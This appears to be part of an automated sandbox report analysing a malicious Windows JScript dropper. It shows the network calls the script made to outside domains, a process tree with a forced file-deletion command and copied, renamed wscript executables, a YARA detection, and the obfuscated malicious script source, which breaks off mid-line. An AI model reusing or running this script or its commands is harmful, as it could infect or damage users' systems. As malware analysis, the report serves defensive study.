                                                                                      Mar 10, 2021 07:01:36.676671982 CET192.168.2.38.8.8.80xd69eStandard query (0)legitville.comA (IP address)IN (0x0001)
                                                                                      Mar 10, 2021 07:01:37.664587021 CET192.168.2.38.8.8.80xa678Standard query (0)101legit.comA (IP address)IN (0x0001)
                                                                                      Mar 10, 2021 07:01:38.256385088 CET192.168.2.38.8.8.80x58f9Standard query (0)ww7.101legit.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Mar 10, 2021 07:01:37.287056923 CET8.8.8.8192.168.2.30xd69eNo error (0)legitville.com204.11.56.48A (IP address)IN (0x0001)
                                                                                      Mar 10, 2021 07:01:37.722069025 CET8.8.8.8192.168.2.30xa678No error (0)101legit.com72.52.178.23A (IP address)IN (0x0001)
                                                                                      Mar 10, 2021 07:01:38.313544035 CET8.8.8.8192.168.2.30x58f9No error (0)ww7.101legit.com76899.bodis.comCNAME (Canonical name)IN (0x0001)
                                                                                      Mar 10, 2021 07:01:38.313544035 CET8.8.8.8192.168.2.30x58f9No error (0)76899.bodis.com199.59.242.153A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • legitville.com
                                                                                      • 101legit.com
                                                                                      • ww7.101legit.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.349702204.11.56.4880C:\Windows\System32\wscript.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Mar 10, 2021 07:01:37.463186979 CET1423OUTGET /0.html HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      Accept-Language: en-US
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                      Host: legitville.com


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.34970372.52.178.2380C:\Windows\System32\wscript.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Mar 10, 2021 07:01:37.885823011 CET1424OUTGET /0.html HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      Accept-Language: en-US
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                      Host: 101legit.com
                                                                                      Mar 10, 2021 07:01:38.240365028 CET1424INHTTP/1.1 302 Found
                                                                                      Date: Wed, 10 Mar 2021 06:01:37 GMT
                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                      X-Powered-By: PHP/5.4.16
                                                                                      Location: http://ww7.101legit.com
                                                                                      Content-Length: 0
                                                                                      Keep-Alive: timeout=5, max=100
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.349704199.59.242.15380C:\Windows\System32\wscript.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Mar 10, 2021 07:01:38.436440945 CET1425OUTGET / HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      Accept-Language: en-US
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                      Host: ww7.101legit.com
                                                                                      Mar 10, 2021 07:01:38.557725906 CET1426INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Wed, 10 Mar 2021 06:01:38 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qX8bODRC2aDPzt6IJCBwajHFDKXIjBHNiK15Ot4+5udkO7djbo9ZURb/sUD4YMghK5Pa+ZC4aBjYsbZiG0uXQQ==
                                                                                      Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 58 38 62 4f 44 52 43 32 61 44 50 7a 74 36 49 4a 43 42 77 61 6a 48 46 44 4b 58 49 6a 42 48 4e 69 4b 31 35 4f 74 34 2b 35 75 64 6b 4f 37 64 6a 62 6f 39 5a 55 52 62 2f 73 55 44 34 59 4d 67 68 4b 35 50 61 2b 5a 43 34 61 42 6a 59 73 62 5a 69 47 30 75 58 51 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44
                                                                                      Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qX8bODRC2aDPzt6IJCBwajHFDKXIjBHNiK15Ot4+5udkO7djbo9ZURb/sUD4YMghK5Pa+ZC4aBjYsbZiG0uXQQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";D
                                                                                      Mar 10, 2021 07:01:38.557766914 CET1428INData Raw: 44 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73
                                                                                      Data Ascii: D.onerror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$
                                                                                      Mar 10, 2021 07:01:38.557806015 CET1429INData Raw: 63 72 65 65 6e 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65
                                                                                      Data Ascii: creen,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else
                                                                                      Mar 10, 2021 07:01:38.557833910 CET1429INData Raw: 77 68 3d 27 2b 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72
                                                                                      Data Ascii: wh='+g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
                                                                                      Mar 10, 2021 07:01:38.557871103 CET1430INData Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70
                                                                                      Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:07:01:29
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js'
                                                                                      Imagebase:0x7ff6bad80000
                                                                                      File size:163840 bytes
                                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:01:30
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje
                                                                                      Imagebase:0x7ff6bad80000
                                                                                      File size:163840 bytes
                                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:01:31
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'
                                                                                      Imagebase:0x7ff77d8b0000
                                                                                      File size:273920 bytes
                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:01:32
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6b2800000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:01:33
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl
                                                                                      Imagebase:0x7ff7c0b90000
                                                                                      File size:163840 bytes
                                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:01:34
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl
                                                                                      Imagebase:0x7ff7c0b90000
                                                                                      File size:163840 bytes
                                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:01:44
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
                                                                                      Imagebase:0x7ff7c0b90000
                                                                                      File size:163840 bytes
                                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:01:52
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
                                                                                      Imagebase:0x7ff7c0b90000
                                                                                      File size:163840 bytes
                                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 0000000B.00000003.238666236.0000025BBBBB1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:07:02:00
                                                                                      Start date:10/03/2021
                                                                                      Path:C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
                                                                                      Imagebase:0x7ff7c0b90000
                                                                                      File size:163840 bytes
                                                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Call Graph

                                                                                      Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      callgraph clusterC0 clusterC2C0 clusterC14C2 clusterC4C0 clusterC16C4 clusterC6C0 clusterC8C6 clusterC10C0 clusterC12C0 clusterC18C0 clusterC20C18 clusterC24C18 clusterC22C0 clusterC26C0 clusterC28C0 E1C0 entry:C0 F15C14 getFolder E1C0->F15C14 F17C16 ExpandEnvironmentStrings E1C0->F17C16 F11C10 charCodeAt E1C0->F11C10 F13C12 fromCharCode E1C0->F13C12 F21C20 atEnd E1C0->F21C20 F25C24 moveNext E1C0->F25C24 F23C22 j E1C0->F23C22 F27C26 match E1C0->F27C26 F29C28 Function E1C0->F29C28 F3C2 ActiveXObject("Scripting.FileSystemObject") F5C4 ActiveXObject("WScript.Shell") F7C6 F9C8 eval F7C6->F9C8 F19C18 Enumerator()

                                                                                      Script:

                                                                                      Code
                                                                                      0
                                                                                      var a = ",{y$g*m%r=-5 ,e($t$R$1zO$7:G670v>5&70*>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"iliwO~xD9H;C7K$=O]XbPA$\"m!i5Kzg!s>$Xl(s#iD:I2E2H6M6C5I45Wvjvv~3J7L2H:5Iykz3F;C5L5H87\"Pzvv5e5A5rz{5Exx~zz\\df ixx=&-wxv~t*2)lzp\"&>0w$R$$i-$Vg*m,imSwnzg*,7wxv~t*m$kCj~pzw/w*i#swnzg*&>0}$R${y$g*m%r=-5 (i*y(r5,=55/5Qvx}2(e$h%q=->$?$K9J7K$2$E-Cx%W*v~r|,F:>2)yww*v~r|,F-30y$R$v2zr,m(s$qzr*,7t(sxi)w7-Aj5A5h=&+wzv$e#i7-Ak5A5h=&xs#t+xzv$e#i7-Av+$R$$i-$Vg*m,imSwnzg*,7w}i\"pCe&t\"mxe*m%r7-Ap%$R$paAj+t5A5_r0ysy$R$7&Ah%x5A54Al{$R${y$g*m%r=i>$1x(}5 ,e($*$R$w2|i*J%pyi(,z-PxCe*x(mwy*i)$R$G\"5gvxxl5,$-5 3\"Awx$R${y$g*m%r=i>$1i5/R$7&Pzvv5x5A54Pj%v5,,e($$$R$E?5r5@5iCpzr|x}?5r@/>$*$R$=x5@Q$J-515x5/5iCg}e(G%hzE*,$-A$*$;A5xPvzx+v$$be*lCeww=x>\"Alv$R${y$g*m%r=i>$1zvv5x5A5&70$$R$)g=i>?{s($=zvv5v5A54P$($Q$)g=i>$:$J$@$J?5v@/>$$$R$)g=x5/5r>05x5/R$hx(m$kCj(s#G}e(G%hz,$$:$G95/5=L-Pvzx+v$$*\"Pzvv5~0s5A5j+rxx~s$,>$1zvv5x*{5A5_7l*x&>D3-{-2#mxv%w%j*2xs#3705&}x*tO3D{-{Ck%s|pz2xs#3705&}x*tO3D{-{Cf~r|2xs#37aPj%v5,,e($~$R$E05lA$-i&?5m5@5x*{Cpzr|x}?5m@/>$1x(}5 ,e($}$R$$i-$Vg*m,imSwnzg*,7Qh\\bPG2hi(zzvmQaLiXe2K2E&>?}2%tzr=&\\Ii&A$*x-_~a>?}2)i*Vzu+i)x]ivhzv=&jwzvBE|i$x705cCy>?}2)i*Vzu+i)x]ivhzv=&Xexlz1Xs$x(s\"&A$7r%1xexlz&>?}2)i*Vzu+i)x]ivhzv=&evvk#e705&$sBgvg}i7-PlCwzxgi'yzw*Lzeyi(,7G%r$ixx~s$&A$7g\"s)i7-PlCwzry,7&>?-i&$R$$i-$Ye*i=lCkzxVp\"Vzw&s$wzLzeyi(w=-Cw&p~x=&Ye*iO$7-Ct%t=-Cw&p~x=&qr7-Cw}m{x=->2|i*X~qz,>$D$F4E4Pm{$=5H<M9H8I4E$Q$-i&-5 (i*y(r5{zt3\"5gvxxl5,z-5 3\"(i*y(r5jvp)iP\"Pzvv5l($R${y$g*m%r=i>$1m{$=i>$,e($*$R$F0$$R$F?zp)i5zvv5x5A56Ar5A54Px(}5 v2(i|[(m*i=&]OXYq`hs{x-e(iq`bmxv%w%j*`q[~rys-wq`Xy(vzr*Zzv)m%rq`Z|&p%vzvq`Vh,e$gzhq`]myhzr705xA$7VZKtHlSgH7-3$xe*g}$=v>$1\"*v/$1eCvzklv~xz,7L`Gj`qW%j*{vvz`qQ~g(s)s{xq`lm$h%{)`qG+v(i$xki(w~s$`qI.t\"s(i(`qEyzvrxiy`qW}s-W+tzv]myhzr705rA$7VZKtHlSgH7-3$xe*g}$=v>$1\"3?,e($(g5A5j+rxx~s$,!i/05w*v>$1zvv5w5A5_r0 $R$E0.05vzw5A5&7?{s($=zvv5m5A54P$~$Q$G9K?5m@/>$1wpmr$R$~?3j%v5,~$R$E?5m5@56J:P$~/@-5 $R$=n5/5wpmr$@$!i/2xlvvXsyiVx=m5)5oz}Cpzr|x}->$:$G9K?.$R$)_~aPwpmr$R$)_ aPwpnr$R$.?3m5A54Pn5A54Pj%v5,,e($/$R$E?5}5@5w*vCpzr|x}?5}@/>$1m5A5,~$@$F-5)56J:Pn5A5, $@$)_~a>$:$G9K?.$R$)_~aPwpmr$R$)_ aPwpnr$R$.?(i)$@A5W*v~r|2{v%qXlvvXsyi=w*vCg}e(G%hzE*,/-5b5wp,)_~a5/5wpnr-5)56J:r-P\"(i*y(r5vzwP\"Pzvv5g%f5A5j+rxx~s$,>$1vzx+v$$be*lCj\"s%v=,F$@$be*lCvvrys#,>-5.54.5E4E4>2*shx(m$k=5K-Cw+f)x(m$k=5>\"Pzvv5~ws5A5_7vzkzh~x705&-m$h%{)1!f705&#v*&A$7v)x(y~&A$7q)g%r{m|&A$7t(sxi.t705&vzvw*&A$7e,k705&&x~r)xvp\"&A$7wye)i*y&&A$7m)wzx+t705&{wG4705&#fvq705&}s+wzgvp\"&A$7l~nvg!x}m)&A$7v+f%x*iy&A$7e+x%v+r)&A$7e,i$kzv705&{m\"i#s$&A$7k#i(&A$7l%x{m.&A$7o\"{!&A$7qwwv&A$7t(sxq%r705&(i|q%r705&)})g\"ivr705&*g&z~i-&A$7y$p%g!i(&A$7{~vzw}e(o705&{myh\"i(&A$7vzw#s$&A$7tzv{q%r705&#w)w705&xpze$i(&A$7s*p705&(s|yzo~p\"i(&A$7j)w705&0szo705&zqzv|i$g/o~x705&yh)&A$7gxwzx+t705&,f)zwi705&xs#f%j~|705&{v)x705&#g)l~i\"h705&0t}h~e|&r?,e($)l}$R${y$g*m%r=s>$1j%v5,,e($ 05|A$~$R$%2\"i$k*lP$~?5n5A5tvv)i^r*,be*lCvvrys#,>$?$~-A$.$R$%_B1~aA$%_~a5A5spnr05spnr$R$.-Pvzx+v$$%?3?,e($!t5A5j+rxx~s$,>$1m{$=fCj~pzI.m)x),wj%$@$}e=k5/5&v4N&>->$lWxv~t*2'y~x=-3?,e($0x5A5j+rxx~s$,>$1x(}5 ,e($*$R$w2%tzrii.x[m\"i=f{s5/5lv,|$@$7eE47-A$M05%E-PxCg\"s)i=-Pm{$=fCj~pzI.m)x),wj%$@$}e=k5/5&v5I&>-5AR${e\"wz-5eCv+r=&:g%q)tzg:$Dg5w}y*h%{$$Dt53{&A$E-P\"5gvxxl5,z-5 3\"Pzvv5j+y5A5j+rxx~s$,>$1zvv5x*x5A5_r?{s($=zvv5m5A5rz{5I$y#i(e*s(,w2|i*J%pyi(,wj%-CJ~pzw>?5%~2vxZry,>?5mCq%zzRz|*,>-5 ~j5,w2|i*I.xzr)m%rce#i=mCm*i#,>2ce#i>$RA5&z|z&>$*x*2&y)l=f{s5/5mCm*i#,>2ce#i>\"(i*y(r5x*x3?,e($ys{$R${y$g*m%r=-5 ~j5,ysy$6A5&7$;*5h%x5/5,K45.5:E$?$L65.55E4E-5BR$$i-$Ye*i=-Ckzxim#i=->$1vzx+v$$ysy\"5i\"wz$1zvv5h%l5A5w}l=_7l*x&>q3q3\"i|m*z~p\"iCg%qq3707l*x&>q3q3F4Fpzk~xCg%qq37a>?,e($yix$R$7&Pj%v5,,e($ys~$R$E?5h%m5@5h%lCpzr|x}?5h%m@/>$1x(}5 9,74705h%lph%mr-Pzvv5l|j5A5~.g,fPhzg5A5h%lph%mr\"5gvxxl5,z-5 3${m$e\"p/$1hzpzxz,0|xzw-Phzpzxz,}k{-3m{$=hzg5%R$7&>$wvze!\"~j5,yix$RA5&7-5 (i*y(r5jvp)i3$zp)i5 ysy$R$yix?ys*$R$$i-$Ye*i=-Ckzxim#i=-Pvzx+v$$ysy\"3\"Pzvv5(5A5j+rxx~s$,{ew05jvx>$1zvv5q5A5f{s5/5lv,|$@$7eE:7-Pzvv5}+r5A5jvx5ARA555C5h%j=-5>5jvxPm{$=}+r5AR${e\"wz-5x}v%{5I(v%v=-Pzvv5n5A5rz{5Exx~zz\\df ixx=&bWmQa6CWzv,i(\\bP]XiTC:C47-PnCs&i$,7KZX705}+r5/5jvf5/5&Cl*q\"&>? 2)i*Vzu+i)x]ivhzv=&jwzvBE|i$x705cCy>? 2)i$h=-Pzvv5g5A5rz{5Exx~zz\\df ixx=&VHdHW2hx(ivq7-PgCq%hz$R$H?x2*}&i5A55PgCs&i$,>?x2-v~xz, 2(i)t%r)iWsy}>?x2)e,iis[m\"i=qA$G-Pzvv5o5A5fCs&i$Xz|*J~pz,#055>?,e($\"$R$!2(ivhVp\",>?!2xp%wz,>?*v/$1fChzpzxzJ~pz,#-3$xe*g}$=i>$1\",e($x05s+x5A5&70!i/$R$paPp5A5pCw&p~x=&Q%B15&>2&s&,>2)t\"m*,7$B1S&>2)l~j*,>2)t\"m*,7&>?{s($=zvv5m5A54P$~$Q$J?5m@/>$!i/2&y)l=pCw}m{x=-Cg}e(G%hzE*,E-5157G-Pj%v5,,e($~$R$E?5m5@5pCpzr|x}?5m@/>$1g5A5ppmr2xlvvXsyiVx=4>$B$!i/_~$:$!i/2\"i$k*lr?%y*$@A5W*v~r|2{v%qXlvvXsyi=g5@57G$T$N95/5g5>5g>?3x(}5 zzvp=s+x>\"5gvxxl5,z-5 3\"Pzvv5w!$R${y$g*m%r=-5 